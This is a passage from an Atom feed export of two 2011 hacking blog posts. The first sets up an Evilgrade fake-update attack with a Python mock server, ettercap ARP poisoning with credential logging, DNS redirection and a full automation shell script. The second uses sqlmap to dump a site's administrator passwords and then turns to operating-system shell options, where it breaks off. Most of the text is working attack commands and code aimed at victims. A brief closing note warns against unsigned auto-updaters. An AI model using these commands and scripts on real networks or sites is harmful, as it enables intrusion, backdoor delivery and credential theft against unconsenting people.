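    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR=1, RD=1, RA=1
    question = query[12:off + 4]
    # Answer RR: pointer to the question name (0xC00C), A, IN, TTL 60, 4-byte RDATA
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, 60, 4) + socket.inet_aton(DNS_ANSWER_IP)
    return header + question + answer


def answered_ip(response):
    """Extract the A record from a response built by dns_reply."""
    return socket.inet_ntoa(response[-4:])


def handle_http(raw):
    """Route a raw HTTP/1.x request by Host header and path, like Evilgrade's vhosts.

    Returns (status, body): the module's agent when Host is an enabled
    VirtualHost and the path is one of its update URLs, else 404.
    """
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    _method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            k, v = line.split(":", 1)
            headers[k.strip().lower()] = v.strip()
    host = headers.get("host", "").split(":")[0].lower()
    name = enabled_vhosts().get(host)
    if name is None or path not in MODULES[name]["paths"]:
        return 404, b"not found"
    return 200, MODULES[name]["agent"]


def run_demo():
    """Walk one victim through both steps: resolve the vhost, then fetch the update."""
    ip = answered_ip(dns_reply(build_query(0x1234, "www.ccleaner.com")))
    req = (b"GET /download/update.exe HTTP/1.1\r\nHost: www.ccleaner.com\r\n"
           b"User-Agent: CCleaner Update Check\r\n\r\n")
    status, body = handle_http(req)
    return ip, status, body[:2]


if __name__ == "__main__":
    print(run_demo())   # ('192.168.1.2', 200, b'MZ')
```

Note what the victim's updater never checks in this exchange: neither the DNS answer nor the downloaded binary is authenticated, which is exactly the gap Evilgrade relies on. An updater that pinned its TLS connection or verified a vendor signature on the file would reject what this server hands back, no matter how good the MiTM is.&lt;br /&gt;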
&lt;br /&gt;
Starting, stopping and checking the status of Evilgrade is just as easy. You simply issue "start", "stop" or "restart" to do the obvious, and you can check on things with the "status" command.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;NOTE: the "status" command reports whether the webserver and DNS server&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; are running, plus details of any victims that have checked in&lt;br /&gt;
&lt;br /&gt;
Command: evilgrade&amp;gt;start&lt;br /&gt;
evilgrade&amp;gt;start&lt;br /&gt;
...&lt;br /&gt;
evilgrade&amp;gt;&lt;br /&gt;
[18/5/2011:15:34:4] - [WEBSERVER] - Webserver ready. Waiting for connections ...&lt;br /&gt;
evilgrade&amp;gt;&lt;br /&gt;
[18/5/2011:15:34:4] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...&lt;br /&gt;
evilgrade&amp;gt;show status&lt;br /&gt;
Webserver (pid 666) already running&lt;br /&gt;
Users status:&lt;br /&gt;
============&lt;br /&gt;
.--------------+-------------------+--------+---------------------------------------.&lt;br /&gt;
| Client       | Module            | Status | Md5,Cmd,File                          |&lt;br /&gt;
+--------------+-------------------+--------+---------------------------------------+&lt;br /&gt;
| 192.168.1.25 | modules::ccleaner | send   | MD5-Hash-Value,'',"./agent/agent.exe" |&lt;br /&gt;
'--------------+-------------------+--------+---------------------------------------'&lt;br /&gt;
evilgrade&amp;gt;stop&lt;br /&gt;
Stopping WEBSERVER&amp;nbsp; [OK]&lt;br /&gt;
Stopping DNSSERVER&amp;nbsp; [OK]&lt;br /&gt;
&lt;br /&gt;
OK, so that is all there is to setting up Evilgrade! From here you just need to pull off a Man-in-the-Middle (MiTM) attack so the victim's DNS lookups end up at Evilgrade, then restart&amp;nbsp;Evilgrade so&amp;nbsp;it can work its magic. One caveat worth stating plainly: ARP poisoning only puts you in the path. With IP forwarding on, the victim's DNS queries still reach the real resolver unless you steer them to Evilgrade's DNS server, for example with ettercap's dns_spoof plugin (an etter.dns entry mapping the module's VirtualHost to DNSAnswerIp) or with an iptables REDIRECT of the victim's UDP/53 traffic to Evilgrade's DNSPort. I suggest leaving Evilgrade running in one terminal window and opening another to pull off the MiTM attack. The MiTM attack has been well documented using all sorts of tools; please read up on the various methods, as there are many ways to go about it, but&amp;nbsp;I will&amp;nbsp;cover one basic example using Ettercap to redirect traffic for a specific target so you can complete our testing of this method without being left hanging.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Getting the MiTM attack working so Evilgrade can do its thing - MiniTutorial:&lt;/strong&gt; Open a new terminal in BackTrack 5 and type the following: &lt;br /&gt;
Command: ifconfig&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Take note of your IP address, default gateway and interface name&lt;br /&gt;
Command: nmap -sP 10.10.10.*&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; This performs a quick ping sweep of the network to find your target; change&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 10.10.10.* to fit your network based on the ifconfig results above (e.g. 192.168.1.*)&lt;br /&gt;
Command: echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;This turns on IP forwarding so the victim's traffic is passed on through your machine instead of being dropped (without it the victim simply loses connectivity, which gets noticed fast)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Confirm: cat /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Result: should return a one (1) to indicate IP forwarding is enabled&lt;br /&gt;
Command: ettercap -T -q -M arp:remote -i eth0 /victim-ip/ /gateway-ip/ -w capture.pcap -l capturefile -P autoadd&lt;br /&gt;
&amp;nbsp;-T starts ettercap in text mode&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; NOTE: You could invoke ettercap with the -G argument only, to open the GTK GUI&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; for ettercap and then pick and choose the plugins to use from the GUI (noobs)&lt;br /&gt;
&amp;nbsp;-q (lowercase) makes ettercap run in quiet mode and not print packet contents in the terminal window&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;NOTE: if you want to see everything or to look cool just omit this flag. Uppercase -Q is "super quiet" mode, which also hides the users and passwords ettercap picks out of the traffic, which is usually not what you want&lt;br /&gt;
&amp;nbsp;-M starts MiTM attack mode&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;NOTE: You can combine the single-letter flags into one argument to simplify&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; things, '-TqM', or keep them separate&lt;br /&gt;
&amp;nbsp;arp is the type of poisoning we want to perform while in MiTM mode; the :remote option tells ettercap to also dissect traffic between the victim and hosts beyond the gateway (the Internet), which is exactly the traffic we care about here&lt;br /&gt;
&amp;nbsp;-w capture.pcap writes every sniffed packet to a pcap file you can open later in Wireshark&lt;br /&gt;
&amp;nbsp;-l capturefile&amp;nbsp;tells ettercap to log the passive profiles, users and passwords it collects into its own info log, "capturefile.eci" (read it back with etterlog, not Wireshark)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; NOTE: you can change the file names to anything you want&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; PRO-TIP: ettercap already pulls logins and credentials out of the stream for you on the fly (that is what the -l log holds),&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; or you can sort through the pcap offline later with Wireshark or your capture analysis tool of choice.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; It is also possible to add SSLstrip to the equation but you will need to figure that out as I&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; don't have time to cover that here...&lt;br /&gt;
&amp;nbsp;-P autoadd tells ettercap to use the autoadd plugin, which, as it sounds, automatically adds hosts to the poisoning list if they come online after the attack has started&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; NOTE: you can add other plugins here or leave it out entirely, it is up to you&lt;br /&gt;
&amp;nbsp;-i eth0 specifies the network interface &lt;br /&gt;
&amp;nbsp;/victim-ip/ is the IP address we want to affect, or in this case ARP poison&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; NOTE: you can leave this simply as "//" to indicate you want to perform the task&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; on the ENTIRE network. This is the ettercap 0.7.x target syntax that ships with BackTrack 5; ettercap 0.8 and later use MAC/IP/IPv6/PORT, so the same target is written /victim-ip// there&lt;br /&gt;
&amp;nbsp;/gateway-ip/ is the IP address we want to impersonate towards the victim&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; NOTE: this does not have to be the gateway, but in most cases this will have the best results, since the victim's DNS queries and update checks all go through it.&lt;br /&gt;
&lt;br /&gt;
EX: ettercap -TqM arp:remote // // -P autoadd&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; This ARP poisons the whole network,&amp;nbsp;adding any new hosts that show up late to our&amp;nbsp;party ;) It is also the noisiest option, and every host on the segment now depends on your machine keeping up, so prefer a single target while testing.&lt;br /&gt;
&lt;br /&gt;
If you fill in /victim-ip/ and /gateway-ip/ and run this command it will start ARP poisoning the hosts you have identified. Being in the path is only half of it: the victim's DNS queries still have to be answered by Evilgrade's DNS server rather than by the real resolver. The two common ways to arrange that are ettercap's dns_spoof plugin (-P dns_spoof, with the update hostnames mapped to your IP in ettercap's etter.dns file) or an iptables NAT rule on your machine that redirects the victim's UDP port 53 traffic to the local Evilgrade DNS server. Once that is in place Evilgrade will start picking up the update requests and begin forging secret agents to pwn your victims. At this point just sit back and watch the sessions stack up in your multi-handler terminal (or wherever you view your connections for your RAT/backdoor). Remember to use the proper method to close ettercap so it re-ARPs the victims and restores their ARP caches when you are done (just hit "q" in the terminal while it is running and give it a second to shut down)... you don't have to, but it will go less noticed if you do, and the victims keep their connectivity.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Personal Note:&lt;/strong&gt; I find it's also nice to save the iptables rules for future use. I suggest saving them before and reloading them once you are done and have ended everything you have running;&lt;br /&gt;
Command: iptables-save &amp;gt; iptables.backup&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; NOTE: iptables-save writes the rule set to standard output, so redirect it into a file; iptables-restore reads it back from standard input&lt;br /&gt;
Command: echo 0 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Confirm: cat /proc/sys/net/ipv4/ip_forward &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Result: should return a zero (0) to indicate IP forwarding is turned off&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; PRO-TIP: If you simply want forwarding on permanently, edit /etc/sysctl.conf and&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;uncomment the net.ipv4.ip_forward=1 line (sysctl -p applies it without a reboot)&lt;br /&gt;
Command: iptables-restore &amp;lt; iptables.backup&lt;br /&gt;
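The steps of this mini tutorial taken together as one script, an added example that is not part of the original post: it snapshots the iptables rules and the forwarding flag before touching anything, diverts the victim's DNS queries to the Evilgrade DNS server running on this host (the redirect the post refers to, done here with an iptables NAT rule), runs ettercap with the flags discussed above, and puts everything back when ettercap exits, including after a Ctrl-C. Assumptions not taken from the post: the interface, victim IP and gateway IP come in as arguments; ettercap 0.7.x target syntax (/ip/) as on BackTrack 5; Evilgrade's DNSSERVER is already listening on UDP port 53 on this machine; the script runs as root.&lt;br /&gt;

```sh
#!/bin/sh
# Added example, not code from the original post. Wraps the MiTM steps in one script that
# records state first and restores it on exit. Assumptions (not from the post): arguments
# are interface, victim IP, gateway IP and an optional log name; ettercap 0.7.x target
# syntax (/ip/) as on BackTrack 5 (0.8 and later want /ip//); Evilgrade's DNS server is
# already listening on UDP/53 on this host; run as root.

IP_FORWARD_FILE=${IP_FORWARD_FILE:-/proc/sys/net/ipv4/ip_forward}

# Syntactic IPv4 check for the two addresses that end up on a command line
# (format only; octets are not range-checked).
is_ipv4() {
    printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$'
}

# Linux interface names: at most 15 characters, no shell metacharacters.
is_ifname() {
    printf '%s\n' "$1" | grep -Eq '^[A-Za-z0-9_.:-]{1,15}$'
}

# True when the kernel forwarding flag in file $1 reads "1".
forwarding_enabled() {
    [ "$(cat "$1")" = "1" ]
}

# NAT rule that sends the victims' DNS queries, which now cross this host, to the local
# Evilgrade DNS server instead of their real resolver.
dns_redirect_rule() {
    printf 'iptables -t nat -A PREROUTING -i %s -p udp --dport 53 -j REDIRECT --to-ports 53\n' "$1"
}

# ettercap command line: -q (lowercase) hides packet contents (-Q would also hide the
# credentials ettercap extracts); arp:remote makes it dissect victim-to-gateway traffic;
# -w writes a pcap Wireshark can open, -l writes ettercap's own .eci log for etterlog.
ettercap_cmd() {
    printf 'ettercap -T -q -M arp:remote -i %s /%s/ /%s/ -w %s.pcap -l %s -P autoadd\n' \
        "$1" "$2" "$3" "$4" "$4"
}

run_mitm() {
    iface=$1
    victim=$2
    gateway=$3
    out=${4:-capture}
    if ! is_ifname "$iface" || ! is_ipv4 "$victim" || ! is_ipv4 "$gateway"; then
        echo "usage: $0 IFACE VICTIM_IP GATEWAY_IP [LOGNAME]"
        return 1
    fi
    case $out in *[!A-Za-z0-9_.-]*) echo "bad log name: $out"; return 1 ;; esac
    iptables-save > "$out.iptables"             # snapshot, as in the Personal Note
    orig_fwd=$(cat "$IP_FORWARD_FILE")
    # Undo on any exit, including Ctrl-C: forwarding flag first, then the firewall rules.
    trap 'echo "$orig_fwd" > "$IP_FORWARD_FILE"; iptables-restore "$out.iptables"' EXIT
    echo 1 > "$IP_FORWARD_FILE"
    if ! forwarding_enabled "$IP_FORWARD_FILE"; then
        echo "could not enable IP forwarding"
        return 1
    fi
    eval "$(dns_redirect_rule "$iface")"         # inputs were validated above
    # Quit ettercap with "q" so it re-ARPs the victims before the trap restores the rest.
    eval "$(ettercap_cmd "$iface" "$victim" "$gateway" "$out")"
}

# Usage: ./mitm.sh eth0 192.168.1.25 192.168.1.1 [logname]
if [ "$#" -ge 3 ]; then
    run_mitm "$@"
fi
```

Run it as ./mitm.sh eth0 192.168.1.25 192.168.1.1 while Evilgrade is up in the other terminal; when you press "q" in ettercap the trap restores the forwarding flag and the saved iptables rules, so the DNS redirect disappears together with the poisoning. The REDIRECT only wins if the local answer beats the real resolver's reply to the victim, which it normally does since it never leaves the segment.&lt;br /&gt;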
&lt;br /&gt;
&lt;strong&gt;General Note:&lt;/strong&gt; If you are performing this or any of the other steps in this tutorial on another Linux distro you may have to put "sudo" in front of the commands for them to work; not an issue in BackTrack as you run as root by default. You can install ettercap using apt-get (apt-get install ettercap) if you need it as well. &lt;br /&gt;
&lt;br /&gt;
I hope you have enjoyed this tutorial as I know I had fun documenting things to share with you, and remember to always be aware of your surroundings before you start clicking away and allowing things to do what they please. Do not put all your faith in a company name: an updater that fetches its files over plain HTTP and does not verify a signature on what it downloads is exactly what this attack abuses, so turn off your auto-updaters or don't allow them to update unless you are on a network you know is safe. Enjoy and stay tuned for more to come when I return in a few weeks....&lt;br /&gt;
Later,&lt;br /&gt;
H.R.
</content><link rel="replies" type="application/atom+xml" href="http://kaoticcreations.blogspot.com/feeds/5213415480444261358/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://kaoticcreations.blogspot.com/2011/05/silently-owning-network-with-isr.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/5213415480444261358?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/5213415480444261358?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/CWtAZ/~3/Gnh4PrCFXHI/silently-owning-network-with-isr.html" title="SILENTLY Owning the Network with ISR EVILGRADE" /><author><name>HR</name><uri>http://www.blogger.com/profile/05957795383670307007</uri><email>noreply@blogger.com</email></author><thr:total>0</thr:total><feedburner:origLink>http://kaoticcreations.blogspot.com/2011/05/silently-owning-network-with-isr.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUIEQnY4cCp7ImA9WhZWFkQ.&quot;"><id>tag:blogger.com,1999:blog-8671806905307905831.post-6495090393668047101</id><published>2011-05-17T23:38:00.000-05:00</published><updated>2011-05-17T23:38:23.838-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-05-17T23:38:23.838-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="DB" /><category scheme="http://www.blogger.com/atom/ns#" term="Database Hacking" /><category scheme="http://www.blogger.com/atom/ns#" term="SQL Injection Tools" /><category 
scheme="http://www.blogger.com/atom/ns#" term="Database Pawnage" /><category scheme="http://www.blogger.com/atom/ns#" term="SQL Injection" /><category scheme="http://www.blogger.com/atom/ns#" term="framework3" /><category scheme="http://www.blogger.com/atom/ns#" term="MSF" /><category scheme="http://www.blogger.com/atom/ns#" term="METASPLOIT" /><category scheme="http://www.blogger.com/atom/ns#" term="Owning" /><category scheme="http://www.blogger.com/atom/ns#" term="SQL" /><category scheme="http://www.blogger.com/atom/ns#" term="sqlmap" /><category scheme="http://www.blogger.com/atom/ns#" term="SQL Hacking" /><title>Owning the Database with SQLMAP and METASPLOIT</title><content type="html">Last time we were using SQLMAP from a Windows platform and could not realize its full potential, so today I will try to teach you how to use it from Linux to take advantage of all that it has to offer. We will begin by booting up our favorite Linux distro of choice; I will be using BackTrack 4R2 for the purposes of this tutorial. It is not required, but it helps because everything is mostly set up already (mostly Metasploit). Once you have your networking services started and a confirmed working Metasploit install, you have a stable work environment, and we will begin by downloading the latest copy of SQLMAP to our system. You can find it online at:&amp;nbsp;&lt;a href="http://sqlmap.sourceforge.net/"&gt;http://sqlmap.sourceforge.net/&lt;/a&gt; or you can check it out from the terminal with the following command:&lt;br /&gt;
&lt;br /&gt;
EX: svn checkout&amp;nbsp;&lt;a href="https://svn.sqlmap.org/sqlmap/trunk/sqlmap"&gt;https://svn.sqlmap.org/sqlmap/trunk/sqlmap&lt;/a&gt; sqlmap-dev &lt;br /&gt;
&lt;div&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; NOTE: if using svn you may be asked to accept the server's HTTPS certificate before it will download. Take a second to read the certificate details it shows you rather than accepting blindly: this is code you are about to run as root.&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Once it is done downloading you will have a new folder called "sqlmap-dev" in the directory you ran the checkout from (your Desktop, if that is where your terminal was), and inside is what we will be using for the remainder of this tutorial: "sqlmap.py". To confirm it is set up properly, issue a quick command to take a peek at what we will be using today:&lt;br /&gt;
&lt;br /&gt;
EX: python sqlmap.py --help&lt;br /&gt;
&lt;br /&gt;
This will display all of the options available for SQLMAP. I will not go into too much detail on the basics as they were covered in my first tutorial. I will pick up where we left off in the previous tutorial; quick recap:&lt;br /&gt;
&lt;br /&gt;
Command: python sqlmap.py -u &lt;a href="http://site.com/example.php?id=1"&gt;http://site.com/example.php?id=1&lt;/a&gt; -f -b --current-user --current-db --dbs --is-dba &lt;br /&gt;
Target Site: &lt;a href="http://site.com/example.php?id=1"&gt;http://site.com/example.php?id=1&lt;/a&gt;&lt;br /&gt;
Current User: 'user@localhost'&lt;br /&gt;
Current Database: database1&lt;br /&gt;
System Users [1]: 'user'@'localhost'&lt;br /&gt;
Current User is DBA: 'False'&lt;br /&gt;
Available Databases [5]:&lt;br /&gt;
&amp;nbsp;[*] information_schema&lt;br /&gt;
&amp;nbsp;[*] database1&lt;br /&gt;
&amp;nbsp;[*] database2&lt;br /&gt;
&amp;nbsp;[*] database3&lt;br /&gt;
&amp;nbsp;[*] database4&lt;br /&gt;
&lt;br /&gt;
Command: python sqlmap.py -u &lt;a href="http://site.com/example.php?id=1"&gt;http://site.com/example.php?id=1&lt;/a&gt; --tables -D database1&lt;br /&gt;
Database: database1&lt;br /&gt;
[13 tables]&lt;br /&gt;
+---------------+&lt;br /&gt;
| access&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
| action&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
| ad&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
| adcriteria&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
| adminhelp&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
| administrator |&lt;br /&gt;
| adminlog&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
| adminmessage&amp;nbsp; |&lt;br /&gt;
| bbcode&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
| config&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
| db_users&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
| users&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
| etc&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
+---------------+&lt;br /&gt;
&lt;br /&gt;
Command: python sqlmap.py -u &lt;a href="http://site.com/example.php?id=1"&gt;http://site.com/example.php?id=1&lt;/a&gt; --columns -D database1 -T administrator&lt;br /&gt;
Database: database1&lt;br /&gt;
Table: administrator&lt;br /&gt;
[3 Columns]&lt;br /&gt;
+--------+--------------+&lt;br /&gt;
| Column | Type&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
+--------+--------------+&lt;br /&gt;
| user&amp;nbsp;&amp;nbsp; | varchar(250) |&lt;br /&gt;
| pass&amp;nbsp;&amp;nbsp; | varchar(250) |&lt;br /&gt;
| ID&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | int(11)&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
| etc&amp;nbsp;&amp;nbsp;&amp;nbsp; | varchar(100) |&lt;br /&gt;
+--------+--------------+&lt;br /&gt;
&lt;br /&gt;
Command: python sqlmap.py -u &lt;a href="http://site.com/example.php?id=1"&gt;http://site.com/example.php?id=1&lt;/a&gt; --dump -D database1 -T administrator -C ID,pass,user&lt;br /&gt;
Database: database1&lt;br /&gt;
Table: administrator&lt;br /&gt;
[2 entries]&lt;br /&gt;
+----+---------------------+---------+&lt;br /&gt;
| ID | pass&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | user&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
+----+---------------------+---------+&lt;br /&gt;
| 1&amp;nbsp; | IhazYOURpassWORD&amp;nbsp;&amp;nbsp;&amp;nbsp; | admin&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
| 2&amp;nbsp; | IhazYOURpassWORDtoo | JohnDoe |&lt;br /&gt;
+----+---------------------+---------+&lt;br /&gt;
We have got Admin credentials! I hope they work on cpanel...&lt;br /&gt;
OK...so we have pulled all that we can from this server using SQL injection, or have we? NOT EVEN CLOSE... &lt;br /&gt;
&lt;div&gt;Since we have changed platforms and are now running on Linux with Metasploit also installed, it is time to start putting SQLMAP to some real ninja work. Let's see what we have to work with: Command: python sqlmap.py --help&lt;/div&gt;&lt;div&gt;...excerpt:&lt;/div&gt;&lt;div&gt;&amp;nbsp; Operating system access:&lt;/div&gt;&lt;div&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; These options can be used to access the back-end database management&lt;/div&gt;&lt;div&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; system underlying operating system.&lt;/div&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; --os-cmd=OSCMD&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Execute an operating system command &lt;br /&gt;
&lt;div&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; --os-shell&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Prompt for an interactive operating system shell&lt;/div&gt;&lt;div&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; --os-pwn&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Prompt for an out-of-band shell, meterpreter or VNC&lt;/div&gt;&lt;div&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; --os-smbrelay&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; One click prompt for an OOB shell, meterpreter or VNC&lt;/div&gt;&lt;div&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; --os-bof&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Stored procedure buffer overflow exploitation&lt;/div&gt;&lt;div&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; --priv-esc&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Database process' user privilege escalation&lt;/div&gt;&lt;div&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; --msf-path=MSFPATH&amp;nbsp; Local path where Metasploit Framework 3 is installed&lt;/div&gt;&lt;div&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; --tmp-path=TMPPATH&amp;nbsp; Remote absolute path of temporary files directory&lt;/div&gt;&lt;br /&gt;
As you can see, quite a few options. The ones backed by Metasploit ('--os-pwn', '--os-smbrelay', '--os-bof' and '--priv-esc') need a working Metasploit install and a Linux box to drive it from, which is why I did not cover them in the last tutorial; '--os-cmd' and '--os-shell' only need sqlmap itself and the right database privileges. We will begin with '--os-cmd' and work our way down from there, explaining the different attack methods as we go...&lt;br /&gt;
&lt;br /&gt;
We can try to run&amp;nbsp;operating system commands using '--os-cmd' and/or '--os-shell'.&lt;br /&gt;
